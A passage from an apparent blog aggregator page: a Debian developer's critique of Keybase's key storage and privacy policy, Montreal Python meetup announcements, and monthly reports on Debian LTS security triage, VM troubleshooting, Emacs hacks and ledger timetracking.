But worse, Keybase offers to upload your private key material to its servers, without clearly and explicitly exposing to the user the potential risks that entails. The key, presumably, is encrypted (at least that is what I can parse from the Keybase privacy policy). Yet this is still a concern: a determined attacker (e.g. a government or another malicious entity) could force Keybase to give up the encrypted private key material and install sniffers that would reveal the passphrase, allowing decryption and impersonation of the related identity.

That is a huge deal. This is what caused Hushmail's demise in 2007: they made similar promises about their "secure" email (in this case) service based on OpenPGP, but since the key was stored on the server, they only had to serve a malicious applet to victims, and were able to give cleartext data to the US government (12 CDs!) under a Mutual Legal Assistance Treaty with Canada.

In Keybase, when I generate a new key, it asks me if I want to upload the key to their servers, and "Yes" is the default, so it is clearly an encouraged policy. This is presumably to enable browser-based crypto, yet this could be done by storing keys within the browser, not on the server.

The mere possibility that the client can meddle with secret key material in such a way is a problem. Even if uploading secret keys to the server is optional, the fact that it is a possibility widens the attack surface on the client significantly.

GPG has been working on isolating private key operations to a separate process (gpg-agent) or to smart cards, and SSH has privilege separation. The idea of uploading secret key material online is so far beyond current practices that it should bring the project to a full stop already.

My private key material is pretty sensitive. I am a Debian developer: if someone gets access to that key, they can upload arbitrary code for thousands of packages, affecting thousands if not millions of users. That is a huge deal, and I am not ready to give that power to an arbitrary third party that I know little about.

Privacy policy issues

Furthermore, the Keybase privacy policy explicitly states that "Logs of this information may persist for an indefinite period", which includes, and I quote:

  • Your computer’s IP address
  • Your preferences and settings (time zone, language, privacy preferences, application preferences, etc.)
  • The URL of the site that referred you to the Service
  • The buttons and controls you clicked on (if any) within the Service
  • How long you used the Service and which parts and features you used
  • Session times and lengths

For a company working to improve users' privacy, this is a pretty bad policy. It exposes Keybase users to undue surveillance of a lot of private information that is not necessary to operate the service. I haven't actually read the rest of the policy, as I was already scared as hell, and figured I would just log off for now and try not to add any extra personal information to that already growing pile.

Let's mention, while I'm here, that the keybase commandline client has this odd way of working where it forks a daemon in the background all the time, even to run just keybase status. One has to wonder if this thing is included in the surveillance data above, which would make the keybase client an amazing surveillance device in itself. To stop all this, you need:

keybase logout
keybase ctl stop

Not quite obvious...

Usability issues

Which brings me to a series of usability issues I have found while working with Keybase. Having worked on usability myself in the Monkeysphere project, I understand how hard those problems can be. But right now, the fact is that keybase is only a commandline client, with some web-based sugar sprinkled on top. I recognize the huge efforts that have been made to make the user experience (UX) as easy as possible through the commandline, but this is definitely not "general public" material yet.

Even as an OpenPGP hacker, I find Keybase can get confusing. Since it has its own keyring, separate from GPG's, things that used to be obvious are suddenly new things to learn. For example, I originally generated a key for anarcat@debian.org in keybase, thinking it would be a separate thing from my current GPG identity. Well, that ended up creating a new key in my GPG keyring, duplicating my existing identity, with no way for me to tell it was a Keybase copy. This could have ended up on the keyservers and confused anyone looking for my PGP key.

Revoking keys

So I revoked that key, which, in itself, is not such an obvious process either. I first had to "drop" the key:

keybase pgp drop '010143572d4e438f457a7447c9758804cc7be44c1ee2b7915c3904567d0a3fb5cf590a'

To find that magic number, I had to go to the website and click through the PGP key to end up on the revoke link, which told me which magic string to use. The web UI was telling me I could use keybase status to get that information, but I couldn't find it in the output:

$ keybase status
Username:      anarcat
Logged in:     no

Device:
    name:      angela
    ID:        070f6a13f2a66afbb463f49dadfd4518
    status:    active

Keybase keys:  unlocked

Session:       anarcat [salt only]

KBFS:
    status:    not running
    version:
    log:       /home/anarcat/.cache/keybase/keybase.kbfs.log

Service:
    status:    running
    version:   1.0.14-1
    log:       /home/anarcat/.cache/keybase/keybase.service.log

Platform Information:
    OS:        linux
    Runtime:   go1.5.3
    Arch:      amd64

Client:
    version:   1.0.14-1

Desktop app:
    status:    not running
    version:
    log:       /home/anarcat/.cache/keybase/Keybase.app.log

Config path:   /home/anarcat/.config/keybase/config.json
Default user:  anarcat
Other users:

command-line client:
    keybase status [pid: 14562, version: 1.0.14-1]

So keybase drop "deletes" the key from the keybase client (and presumably the server). One problem here is that we have three different verbs to mean the same thing: in some places, the website says "deleted" (in the web graph), the commandline client uses "drop" and everyone else using PGP in the world uses "revoke". So what is it?

Also note that just dropping the key is not enough to eradicate it: you still need to generate and import a revocation certificate on GPG's side as well. This makes sense, because you may have imported that key, and you may not want to destroy it when you remove it from keybase, but there could be a little better guessing and UX here as well.

Password usage

Then another problem is that, when you sign up on the commandline, it asks you to choose a passphrase. It's not clear at all from the UI what that passphrase is for. Is it to protect the private key material? To log in to the website? Both? It turns out it is actually to log in to the website and the Keybase API. It could also be the key to the private key material, but I haven't quite figured that out yet.

Similarly, the "paper devices" are a little confusing to me as well. The registration process is fairly insistent that I need to write a series of secret words down on a piece of paper and put it my wallet. This is based on the idea that you can use that key to recover your account and setup new devices. However, it is not made clear at all how those credentials should be protected or used. What if I lose my wallet? What do I do then? Is it okay if i write it on the back of my laptop instead? I know it sounds like stupid questions to crypto geek, but it's definitely stuff people will do, and education, at all levels, is necessary here.

The existing web of trust

Finally, I found it surprisingly counter-intuitive to sign keys with keybase. I was assuming the whole point of the thing was to expand the web of trust, but it seems their mission lies somewhere else: there is no facility to sign keys directly in keybase. You sign statements on various social sites (Github, Twitter, Reddit...) but doing traditional key exchanges seems to be off limits.

My obvious use case was to sign my existing key material with my newly generated anarcat@keybase.io key, so that keybase would become another way of verifying my identity. Well, this is not possible with keybase directly - you still have to go through the regular:

gpg --sign-key DEADBEEF

Which is really unfortunate, because some craaaazy people like me insist on sometimes doing in-person, actually secure key exchanges, and the tools to do this right now (mainly gpg, caff and monkeysign) really need a lot of love and help. Keybase could have helped a lot in pushing those initiatives forward and bringing new ways of doing secure key exchanges, instead of only lowering the standards of cryptographic identity.

Usual proprietary startup rant

I can't help but finish by noticing that the whole basic problem with Keybase is more fundamental than a few usability issues, which can all be fixed fairly easily.

Keybase.io is a web-based service built on a proprietary server side. The client is freely downloadable and free software - but the server side is not. This makes us rely on a central point of failure and on the goodwill of those operators, not only to keep the service running (for free?) indefinitely, but to protect us against all attackers, state-run or otherwise.

This is definitely against basic free software principles and the open, federated architecture of the internet, well embodied in the Franklin Street Statement. Online services should be decentralized and open, like the OpenPGP keyservers have always been, period.

Conclusion

I am curious to see where Keybase brings us, as a community. So far, I am concerned about centralization and the devaluation of the web of trust as a cryptographic system. I do not believe that trusting multiple corporate social networking sites brings much benefit to our security, although it does improve usability significantly and is certainly better than TOFU, so that part of the project is definitely interesting, especially since it leverages classical internet protocols like DNS and HTTPS.

Key exchange is a critical problem that still hasn't properly been resolved in the cryptographic community. Most efforts at building communication tools (say, Signal or Telegram) mostly ignore the problem and expect people to read out strings of numbers, or rely on synchronous communications (see the Axolotl ratchet for Signal's take on it). Keybase's attempts at fixing this are great, but need much more work to actually resolve the PKI issues in a significant way.

More fundamentally, the practice of storing keys on the servers should just stop: it is a definite no-go for me, and a classic crypto mistake that has bitten way too many people. In my mind, it discredits the whole project. The point of OpenPGP is end-to-end encryption across devices: storing the keys on a server breaks that apart, and doesn't improve much on the existing HTTPS security systems already in place on the web.

It is especially a problem given the new waves of attacks on cryptography from western governments, from the UK to California... Until those issues are resolved, I can't get myself to recommend Keybase to anyone just yet.

Post-scriptum

Note to Keybase developers: I considered filing issues regarding the above, but unfortunately I was unable to filter through the gigantic GitHub issues list for duplicates, and didn't have time to file detailed reports for everything. I apologize for bypassing those usual conventions.

If you want to try out Keybase to form your own opinion, I do have 4 invites I can give away, but I will do so only if you need to test specific issues. Otherwise, I note that there is a Request For Package for the Debian package to become official, which Debian developers (or Keybase developers!) may be interested in completing.


Montréal-Python 57: Biogeographical Ascent

Montreal Python - Mon, 03/07/2016 - 00:00

We're about a month away from the next PyCon conference in Portland, Oregon, and we are organizing our 58th meetup at our lovely UQAM. Join us if you would like to see what the Python community in Montreal is up to.

As usual, we are welcoming guests presenting in both languages, and they will show you their projects and achievements.

Don't forget to join us after the meetup at the Benelux to celebrate spring in our lovely city.

Flash presentations

Kate Arthur: Kids CODE Jeunesse

Kids Code Jeunesse is dedicated to giving every Canadian child the chance to learn to code and to learn computational thinking. We introduce educators, parents and communities to intuitive teaching tools.

We work in classrooms and community centres, host events, and give workshops to support engaging educational experiences for everyone.

http://kidscodejeunesse.org/

Christophe Reverd: Club Framboise

A presentation of Club Framboise, the community of Raspberry Pi users in Montreal.

http://clubframboise.ca/

Main presentations

Vadim Gubergrits: DIY Quantum Computer

An introduction to Quantum Computing with Python.

Pascal Priori: santropol-feast: Savoir-faire Linux and volunteers support the Santropol Roulant

As part of the Maison du logiciel libre, Savoir-faire Linux and volunteers are supporting the Santropol Roulant, a Montreal community organization, in building a Django-based platform to manage its client database. At the heart of Santropol Roulant's activities is its meals-on-wheels service, which cooks, prepares and delivers more than a hundred hot meals every day to people losing their autonomy. The client database plays a key role in that chain of services. Built with Django, the project is looking for volunteers who want to get involved and contribute to the continued development of the platform!

https://github.com/savoirfairelinux/santropol-feast

George Peristerakis: How CI is done in Openstack

In George's last talk, there were a lot of questions about the details of integrating code review and continuous integration in OpenStack. This talk is a follow-up on the process and the technology behind implementing CI for OpenStack.

Ivo Tzvetkov: Neolixir

An ORM for easy modelling and integration of Neo4j graph databases

https://github.com/kbremner/neolixir

Where

UQÀM, Pavillon PK

201 Président-Kennedy Avenue

Room PK-1140

When

Monday, May 9th 2016

Schedule
  • 6:00pm — Doors open
  • 6:30pm — Presentations start
  • 7:30pm — Break
  • 7:45pm — Second round of presentations
  • 9:00pm — End of the meeting, have a drink with us
We’d like to thank our sponsors for their continued support:
  • UQÀM
  • Bénélux
  • w.illi.am/
  • Outbox
  • Savoir-faire Linux
  • Caravan
  • iWeb

ConFoo is coming!

Montreal Python - Mon, 02/22/2016 - 00:00

ConFoo, a community conference, is one of the most important events for developers. It covers a multitude of programming languages, including Python. There are a total of 155 presentations, two of which are amazing keynotes about cloud-connected robots and machine ethics. In addition, the innovation night will showcase local entrepreneurs who have built fascinating technologies.

ConFoo 2016 will be held on February 24-26 in Montreal. Tickets are currently sold at a discount. There are also many socials that are free and open to the public: https://confoo.ca/en/2016/activities

Here is a preview of what the Python track holds: https://confoo.ca/en/2016/t/python.


Montréal-Python 57: Call for speakers

Montreal Python - Mon, 02/22/2016 - 00:00

In March, we are getting back to our roots and visiting our friends at UQAM. For the occasion, it's an opportunity to come present, because we are looking for speakers for talks of 30, 15 or 5 minutes.

For example, if you are using Python to deploy Docker services, doing Big Data, or simply having fun discovering new tricks that make your life easier, we want you on stage :)

We are also looking for people interested in presenting a module of the month, or a module that you love!

To submit your talk, write us at mtlpyteam@googlegroups.com

Where

UQAM, more information coming soon

When

Monday, March 14th 2016

Schedule
  • 6:00pm — Doors open
  • 6:30pm — Presentations start
  • 7:30pm — Break
  • 7:45pm — Second round of presentations
  • 9:00pm — End of the meeting, have a drink with us
We’d like to thank our sponsors for their continued support:
  • UQÀM
  • Bénélux
  • w.illi.am/
  • Outbox
  • Savoir-faire Linux
  • Caravan
  • iWeb
Catégories: External Blogs

My free software activities, february 2016

Anarcat - mar, 02/16/2016 - 20:43
Debian Long Term Support (LTS)

This is my third month working on Debian LTS, started by Raphael Hertzog at Freexian. This was my first month on frontdesk duty, and I did a good amount of triage. I also performed one upload and reviewed a few security issues.

Frontdesk duties

I spent some time trying to get familiar with the frontdesk duty. I still need to document a bit of what I learned, which did involve asking around for parts of the process. The following issues were triaged:

  • roundcube in squeeze was happily not vulnerable to CVE-2015-8794 and CVE-2015-8793, as the affected code was not present. roundcube is also not shipped with jessie, but the backport is vulnerable
  • the php-openid vulnerability was actually just a code sample, a bug report comment clarified all of CVE-2016-2049
  • ffmpeg issues were closed, as it is not supported in squeeze
  • libxml2 was marked as needing work (CVE-2016-2073)
  • asterisk was triaged for all distros before I found out it is also unsupported in squeeze (CVEs coming up: AST-2016-001, AST-2016-002, AST-2016-003)
  • libebml and libmatroska were marked as unsupported, although an upload of debian-security-support will be necessary to complete that work (bug #814557 filed)
Uploads and reviews

I only ended up doing one upload, of the chrony package (CVE-2016-1567), thanks to the maintainer, who provided the patch.

I tried my best to sort through the issues with tiff (CVE-2015-8668 and CVE-2015-7554), which didn't have obvious fixes available. openSUSE seems to have patches, but it is really hard to find them through their issue trackers, which were timing out on me. Hopefully someone else can pick that one up.

I also tried and failed to reproduce the cpio issue (CVE-2016-2037), which, at the time, didn't have a patch for a fix. This ended up being solved and Santiago took up the upload.

I finally spent some time trying to untangle the mess that is libraw, or more precisely, all the packages that embed dcraw code instead of linking against libraw. Now I feel even more strongly about Debian policy section 4.13, which states that Debian packages should not ship with copies of other packages' code. The embedding made it really hard to figure out which packages were vulnerable: it was hard to establish which versions of libraw/dcraw were actually affected by the bug, and even just which packages were copying code from libraw. I wish I had found out about secure-testing/data/embedded-code-copies earlier... Still, it was interesting to get familiar with codesearch.debian.net to try to find copies of the vulnerable code, although that was not working so well. Kudos to darktable 2.0 for getting rid of their embedded copy of libraw, by the way - it made darktable completely immune to the issue: the versions in stretch and sid do not have the code at all, and older versions carry non-vulnerable copies of it.

Issues with VMs again

I still had problems running a squeeze VM - not wanting to use VirtualBox because of the overhead, I got lost for a bit trying to use libvirt and KVM. A bunch of issues crept up: virt-manager would just fail on startup with an error saying "interface mtu value is improper", which is a very unhelpful error message (what is a proper value??) - and, for the record, the MTU on eth0 and wlan0 is the fairly standard 1500, while lo is at 65536 bytes, nothing unusual there as far as I know.

Then the next problem was actually running a VM - I still somewhat expected to be able to boot off a chroot, something I should definitely forget about, it seems (boot loader missing? not sure). I ended up calling virt-install with the live ISO image I was previously using:

    virt-install --virt-type kvm --name squeeze-amd64 --memory 512 \
      --cdrom ~/iso/Debian/cdimage.debian.org_mirror_cdimage_archive_6.0.10_live_amd64_iso_hybrid_debian_live_6.0.10_amd64_gnome_desktop.iso \
      --disk size=4 --os-variant debiansqueeze

At least now I have an installed squeeze VM, something I didn't get to do in Virtualbox (mostly because I didn't want to wait through the install, because it was so slow).

Finally, I still have trouble getting a command-line console on the VM: somehow, running virsh console squeeze-amd64 doesn't give me a login terminal, and worse, it actually freezes the terminal that I do get with virt-viewer squeeze-amd64, which definitely sounds like a bug.

I documented a bit more of that setup in the Debian wiki KVM page so hopefully this will be useful for others.

Other free software work

I continued my work on improving timetracking with ledger in my ledger-timetracking git repository, which now got a place on the new plaintextaccounting.org website, which acts as a portal for ledger-like software projects and documentation.

Darktable 2.0

I had the pleasure of trying the new Darktable 2.0 release, which only recently entered Debian. I built a backport for jessie, which works beautifully: much faster thumbnail rendering, no dropping of history when switching views... The new features are great, but I also appreciate how they are being very conservative in their approach.

Darktable is great software: I may have trouble approaching the results others are having with Lightroom and Snapseed, but those are proprietary software that I can't use anyway. I also suspect that I just don't have enough of a clue of what I'm doing to get the results I need in Darktable. Maybe with hand-holding, one day, I will surpass the results I get with the JPEGs from my Canon camera. Until then, I turned off RAW exports in my camera to try to control the explosion of disk use I have seen since I got that camera:

    41M     2004
    363M    2005
    937M    2006
    2,2G    2007
    894M    2008
    800M    2009
    1,8G    2010
    1,4G    2011
    9,8G    2012
    31G     2013
    26G     2014
    9,8G    2015

The drop in 2015 is mostly due to me taking fewer pictures in the last year, for some reason...

Markdown mode hacks

I ended up writing some elisp for markdown mode. It seems I am always writing links like [text](link), which seems more natural at first, but then the formatting looks messier, as paragraph wrapping is all off because of the long URLs. So I always ended up converting those links, which was a painful series of keystrokes.

So I made a macro, and while I was at it, why not rewrite it as a lisp function. Twice.

Then I was told by the markdown-mode.el developers that they had already fixed that (in the 2.1 version, not in Debian jessie) and that the C-c C-a r key binding actually recognized existing links and conveniently converted them.

I documented my adventures in bug #94, but it seems I wrote this code for nothing else than re-learning Emacs lisp, which was actually quite fun.
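For what it's worth, the same inline-to-reference conversion is easy to script outside Emacs too. Here is a rough Python sketch of the idea - my own illustration, not the markdown-mode implementation, and the function name is made up; it also ignores edge cases like nested brackets or links inside code spans:

    import re
    import sys

    def inline_to_reference(text):
        """Convert [text](url) links to [text][n] plus trailing definitions."""
        refs = []

        def repl(match):
            refs.append(match.group(2))          # remember the URL
            return "[%s][%d]" % (match.group(1), len(refs))

        body = re.sub(r"\[([^\]]*)\]\(([^)]+)\)", repl, text)
        defs = "\n".join("[%d]: %s" % (i + 1, url)
                         for i, url in enumerate(refs))
        return body + ("\n\n" + defs + "\n" if defs else "")

    print(inline_to_reference(sys.stdin.read()))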

More emacs hacking

Another thing I always wasted time doing by hand is "rename file and buffer". Often, you visit a file but it's named wrong. My most common case is a .txt file that I rename to .mdwn.

I would then have to do:

    M-x rename-file <ret> newfile
    M-x rename-buffer <ret> newfile
    C-x C-s <ret> newfile

Really annoying.

Turns out that set-visited-file-name actually does most of the job, but doesn't actually rename the file, which is really silly. So I wrote this small function instead:

    (defun rename-file-and-buffer (newfname)
      "Combine rename-file and rename-buffer.
    set-visited-file-name does most of the job, but unfortunately
    doesn't actually rename the file.  rename-file does that, but
    doesn't rename the buffer.  rename-buffer only renames the
    buffer, which is pretty pointless.
    Only operates on the current buffer because set-visited-file-name
    also does so and we don't bother doing excursions around."
      (interactive "GRename file and buffer: ")
      (let ((oldfname (buffer-file-name)))
        (set-visited-file-name newfname nil t)
        (rename-file oldfname newfname)))

Not bound to any key, really trivial, but doing this without that function is really non-trivial, especially since set-visited-file-name needs special arguments to not mark the file as modified.

IRC packages updates

I updated the Sopel IRC bot package to the latest release, 6.3.0. They have finally switched to Requests, but apart from that, no change was necessary. I am glad to finally see SNI support working everywhere in the bot!

I also updated the Charybdis IRC server package to the latest stable release, 3.5.0. This release is great news, as I was able to remove 5 of the 7 patches I was dragging along in the Debian package. The previous Charybdis stable release was over 3 years old: 3.4.2 was released in December 2012!

I spent a good chunk of time making the package reproducible. I filed a bug upstream and eventually made a patch to make it possible to hardcode a build timestamp, which seems to have been the only detectable change in the reproducible build infrastructure. Charybdis had been FTBFS for a while in sid, and the upload should fix that as well. Unfortunately, Charybdis still doesn't build with hardening flags - but hopefully a future update of the package should fix that. It is probably because CFLAGS are not passed around properly.
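I can't vouch that this is exactly what the patch does (the Charybdis patch itself is in C), but the general approach promoted by the Reproducible Builds project is to honor the SOURCE_DATE_EPOCH environment variable instead of the wall clock; in sketch form:

    import os
    import time

    # Honor the deterministic timestamp if the build environment provides
    # one (SOURCE_DATE_EPOCH is a Unix timestamp); fall back to the clock
    # for ordinary, non-reproducible builds.
    build_time = int(os.environ.get("SOURCE_DATE_EPOCH", time.time()))
    stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(build_time))
    print("Build date: %s" % stamp)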

There's really interesting stuff going on in the IRC world. Even though IRC is one of the oldest protocols still in operation (1988, even before the Web, but after SMTP and the even more venerable FTP), it is still being actively developed, with a working group drafting multiple IRCv3 extensions to the protocol defined in RFC 1459.

For example, IRCv3.3 includes a Strict Transport Security extension, which tries to ensure users use encrypted channels as much as possible, through warnings and STARTTLS support. Charybdis goes even further by proposing a reversal of the +S ("secure channel") flag, where all channels are secure by default and you need to deliberately mark a channel as insecure with the +U flag if you actually want to allow users on a clear-text connection to join the channel. A transition mechanism is also proposed.

Miscellaneous bug reports

In no particular order...

I fell face-first into this amazing game that is endless-sky. I made a small pull request on the documentation, a bug report and a feature request.

I forwarded a bug report, originally filed against monkeysign, to the pyqrencode maintainers.

I filed a bug against tails-installer, which just entered Debian; it was mostly usability issues.

I discovered the fim image viewer, which re-entered Debian recently. It seemed perfect to adjust my photos-import workflow, so I added it to my script, to be able to review photos prior to importing them into Darktable and git-annex.

Catégories: External Blogs

Montréal-Python: Call to Action

Montreal Python - lun, 02/01/2016 - 00:00

Ladies and Gentlemen, we at Montreal Python are super excited for 2016 and we have come up with some great ideas.

In order to turn these ideas into reality, we will need some help. Montreal Python is an open community and collaboration is key to our success. So we are inviting beginners, experts and newcomers to join us at our next organization meeting on Monday February 8th.

Here we will discuss topics about:

  • Annual event / conference
  • Workshops
  • Hackathons / Project nights
  • The future of Montreal Python / elections

Montreal has a pretty exciting Python scene, and thanks to the community, that is something we'll maintain for years to come. Now is your chance to come and make things happen.

When

Monday February 8th at 6pm

Where

Shopify Offices
490 rue de la Gauchetière west
https://goo.gl/maps/MJrA2RN8e912

Who

Anyone who wants to help or is curious about the Python community in Montreal

For those who can't attend, don't worry: send us an email with your ideas at mtlpyteam@googlegroups.com.

Catégories: External Blogs

My free software activities, January 2016

Anarcat - dim, 01/31/2016 - 17:18
Debian Long Term Support (LTS)

This is my second month working on Debian LTS, started by Raphael Hertzog at Freexian. I think this month has been a little better for me, as I was able to push two DLAs (Debian LTS Advisories, similar to regular DSAs, Debian Security Advisories, but applying only to LTS releases).

phpMyAdmin and Prosody

I pushed DLAs for phpmyadmin (DLA-406-1) and prosody (CVE-2016-0756). Both were pretty trivial, but I still had to boot a squeeze VM to test the resulting packages, something that was harder than expected. Still, the packages were accepted in squeeze-lts and should work fine.

icu and JDK vulnerabilities

I also spent a good amount of time trying to untangle the mess that Java software has become, and in particular the icu vulnerabilities CVE-2015-4844 and CVE-2016-0494. I ended up being able to backport patches and build packages, not without a significant amount of pain because upstream failed to clearly identify which patches did what.

The fact that they (Oracle) did not notify their own upstream (icu) is also a really questionable practice in the free software world, which doesn't come as a surprise coming from Oracle anymore, unfortunately. Even worse, CVE-2016-0494 was actually introduced as part of the fix for CVE-2015-4844. I am not even sure the patches provided actually fix the problem because of course Oracle didn't clearly state what the problem was or how to exploit it.

Still: I did the best I could under the circumstances and built packages, which I shared with the debian-lts list in the hope others could test them. I am not very familiar with the icu package, or even Java anymore, so I do not feel comfortable uploading those fixes directly right now, especially since I just trusted whatever was said on the Red Hat and icu bug trackers. Hopefully someone else can pick this up and confirm I had the right approach.

OpenSSH vulnerabilities

I also worked on CVE-2016-1908, a fairly awkward vulnerability in OpenSSH involving the bypass of a security check in the X server that forbids certain clients from looking at keystrokes, selections and more from other clients. The problem is pretty well described in this article. Basically, there are two ways for applications to talk to the X server: "trusted" and "untrusted". If an application is "trusted", it can do all sorts of stuff like manipulate the clipboard, send keystrokes to other applications, sniff keystrokes and so on. This seems fine if you are running local apps (xdotool is a good way to test this) but can be pretty bad once X forwarding comes into play in SSH, because then the remote server can use your X credentials to run arbitrary X code in your local X server. In other words, once you forward X, you trust the remote server as if it were local, more or less.

This is why OpenSSH 3.8 introduced the distinction between -X (untrusted) and -Y (trusted). Unfortunately, after quite a bit of research and work to reproduce the issue (I could not reproduce it!), I realized that Debian has, ever since 3.8 was released (around the "sarge" days!), forcibly defaulted ForwardX11Trusted to yes, which makes -X and -Y behave the same way. I described all of this in a post to the LTS list and the OpenSSH maintainers, and it seems there were good reasons for this back then (-X actually breaks a lot of X clients; for example, selecting text will crash xterm), but I still don't quite see why we shouldn't tell people to use -Y consciously if they need to, instead of defaulting to the nasty insecure behavior.

Anyways, this will probably end up being swept under the rug for usability reasons, but just keep in mind that -X can be pretty nasty if you run it against an untrusted server.

Xscreensaver vulnerability

This one was fun. JWZ finally got bitten by his own rants with a pretty embarrassing vulnerability (CVE-2015-8025) that allowed one to crash the login dialog (and unlock the screen) by hot-swapping external monitors (!). I worked on trying to reproduce the issue (I couldn't: my HDMI connector stopped working on my laptop, presumably because of a Linux kernel backport) and on building the patches provided by the maintainer on wheezy, and pushed debdiffs to the security team, which proceeded with the upload.

Other LTS work

I still spend a bit too much time for my taste trying to find work in LTS land. Very often, all the issues are assigned, or the ones that remain seem impossible to fix (like the icu vulnerabilities) or belong to packages so big that I am scared to work on them (like eglibc). Still, the last week of work was much better, thanks to the excellent work that Guido Günther has done on the front desk duties this week. My turn is coming up next week and I hope I can do the same for my fellow LTS workers.

Oh, and I tried to reproduce the cpio issue (CVE-2016-2037) and failed, because I didn't know enough about Valgrind. But even then, I don't exactly know where to start to fix that issue. It seems no one does, because this unmaintained package is still not fixed anywhere...

systemd-nspawn adventures

In testing the OpenSSH, phpMyAdmin and prosody issues, I had high hopes that systemd-nspawn would enable me to run an isolated squeeze container reliably. But I had trouble: for some reason, squeeze does not seem to like nspawn at all. First off, it completely refuses to boot because nspawn doesn't recognize the directory as an "OS root directory", which, apparently, needs the os-release file (in /etc, but it doesn't say that because it would be too easy):

    $ sudo systemd-nspawn -b -D /var/cache/pbuilder/squeeze-amd64-vm
    Directory /home/pbuilder/squeeze-amd64-vm doesn't look like an OS root directory (os-release file is missing). Refusing.

I just created that as an empty file (it works: I also tried copying it from a jessie system and "faking" the data in it, but it's not necessary), and then nspawn accepts booting it. The next problem is that it just hangs there: it seems that the getty programs can't talk to the nspawn console:

    $ sudo systemd-nspawn -b -D /var/cache/pbuilder/squeeze-amd64-vm
    Spawning container squeeze-amd64-vm on /home/pbuilder/squeeze-amd64-vm.
    Press ^] three times within 1s to kill container.
    /etc/localtime is not a symlink, not updating container timezone.
    INIT: version 2.88 booting
    Using makefile-style concurrent boot in runlevel S.
    Setting the system clock.
    Cannot access the Hardware Clock via any known method.
    Use the --debug option to see the details of our search for an access method.
    Unable to set System Clock to: Sun Jan 31 15:57:31 UTC 2016 ... (warning).
    Activating swap...done.
    Setting the system clock.
    Cannot access the Hardware Clock via any known method.
    Use the --debug option to see the details of our search for an access method.
    Unable to set System Clock to: Sun Jan 31 15:57:31 UTC 2016 ... (warning).
    Activating lvm and md swap...done.
    Checking file systems...fsck from util-linux-ng 2.17.2
    done.
    Mounting local filesystems...done.
    Activating swapfile swap...done.
    Cleaning up temporary files....
    Cleaning up temporary files....
    INIT: Entering runlevel: 2
    Using makefile-style concurrent boot in runlevel 2.
    INIT: Id "2" respawning too fast: disabled for 5 minutes
    INIT: Id "1" respawning too fast: disabled for 5 minutes
    INIT: Id "3" respawning too fast: disabled for 5 minutes
    INIT: Id "4" respawning too fast: disabled for 5 minutes
    INIT: Id "5" respawning too fast: disabled for 5 minutes
    INIT: Id "6" respawning too fast: disabled for 5 minutes
    INIT: no more processes left in this runlevel

Note that before the INIT messages show up, quite a bit of time passes, around a minute or two. And then the container is just stuck there: no login prompt, no nothing. Turning off the VM is also difficult:

    $ sudo machinectl list
    MACHINE                          CONTAINER SERVICE
    squeeze-amd64-vm                 container nspawn

    1 machines listed.
    $ sudo machinectl status squeeze-amd64-vm
    squeeze-amd64-vm
           Since: dim 2016-01-31 10:57:31 EST; 4min 44s ago
          Leader: 3983 (init)
         Service: nspawn; class container
            Root: /home/pbuilder/squeeze-amd64-vm
         Address: fe80::ee55:f9ff:fec5:f255
                  2001:1928:1:9:ee55:f9ff:fec5:f255
                  fe80::ea9a:8fff:fe6e:f60
                  2001:1928:1:9:ea9a:8fff:fe6e:f60
                  192.168.0.166
            Unit: machine-squeeze\x2damd64\x2dvm.scope
                  ├─3983 init [2]
                  └─4204 lua /usr/bin/prosody
    $ sudo machinectl poweroff squeeze-amd64-vm   # does nothing
    $ sudo machinectl terminate squeeze-amd64-vm  # also does nothing
    $ sudo kill 3983      # does nothing
    $ sudo kill -9 3983
    $

So only the latter kill -9 worked:

Container squeeze-amd64-vm terminated by signal KILL.

Pretty annoying! So I ended up doing all my tests in a chroot, which involved shutting down the web server on my laptop (for phpmyadmin) and removing policy-rc.d to allow the services to start in the chroot. That worked, but I would prefer to run that code in a container. I'd be happy to hear how other maintainers are handling this kind of stuff.

For the OpenSSH vulnerability testing, I also wanted to have an X server running from squeeze, something I found surprisingly hard. I was not able to figure out how to make qemu boot from a directory (the above chroot), so I turned to the squeeze live images from the cdimage archive. Qemu, for some reason, was not able to boot those either: I would only get a grey screen. So I ended up installing VirtualBox, which worked perfectly, but I'd love to hear how I could handle this better as well.

Other free software work

As usual, I did tons more stuff on the computer this month. Way more than I should have, actually. I am trying to take some time to reflect upon my work and life these days, and the computer is more part of the problem than of the solution, so these activities feel more like a vice I can't get rid of than like an accomplishment. Still, you might be interested to know about them, so here they are.

Ledger timetracking

I am tracking the time I work on various issues through the overwhelming org-mode in Emacs. The rationale I had was that I didn't want to bother writing yet another time tracker, having written at least two before. One is the old phpTimeTracker, the other is a rewrite that never got anywhere, and finally, I had to deal with the formidable kProject during my time at Koumbit.org. All of those made me totally allergic to project trackers, timetrackers, and reinventing the wheel, so I figured it made sense to use an already existing solution.

Plus, org-mode allows me to track todos in a fairly meaningful way and I can punch into todo items fairly transparently. I also had a hunch I could bridge this with ledger, a lightweight accounting tool I started using recently. I was previously using the heavier GnuCash, almost a decade ago - but I really was seduced by the idea of a command-line tool that stores its data in a flat file that I can check in to git.

How wrong I was! First off, ledger can't read org files out of the box. It's weird, but you need to convert those files into timeclock.el-formatted files, which, oddly enough, is a completely different file format from a completely different timetracker. It is, at least, a remarkably simple format. An example:

    i 1970-01-01 12:00:00 project test 4h
    o 1970-01-01 16:00:00

... which makes it possible to write a timetracker with two simple shell aliases:

    export TIMELOG=$HOME/.timelog
    alias ti="echo i `date '+%Y-%m-%d %H:%M:%S'` \$* >>$TIMELOG"
    alias to="echo o `date '+%Y-%m-%d %H:%M:%S'` >>$TIMELOG"

How's that for simplicity!
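Parsing the format is just as trivial. Here is a minimal Python sketch of a per-project report - my own illustration, assuming well-formed, alternating i/o lines and no error handling:

    import os.path
    from collections import defaultdict
    from datetime import datetime

    def report(path):
        """Sum hours per project from a timeclock.el-style log."""
        totals = defaultdict(float)
        clock_in = None
        with open(path) as log:
            for line in log:
                fields = line.split()
                stamp = datetime.strptime(" ".join(fields[1:3]),
                                          "%Y-%m-%d %H:%M:%S")
                if fields[0] == "i":        # check-in: remember start, project
                    clock_in = (stamp, " ".join(fields[3:]))
                elif fields[0] == "o" and clock_in:  # check-out: accumulate
                    start, project = clock_in
                    totals[project] += (stamp - start).total_seconds() / 3600
                    clock_in = None
        return dict(totals)

    print(report(os.path.expanduser("~/.timelog")))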

So you use John Wiegley's org2tc (or my fork, which adds a few improvements) to convert from org to timeclock.el. From there on, a bunch of tools can do reporting on those files, the most interesting obviously being ledger itself, as it can read those files natively (although hledger has trouble including them). So far so good: I can do time tracking very easily and report on my time now!

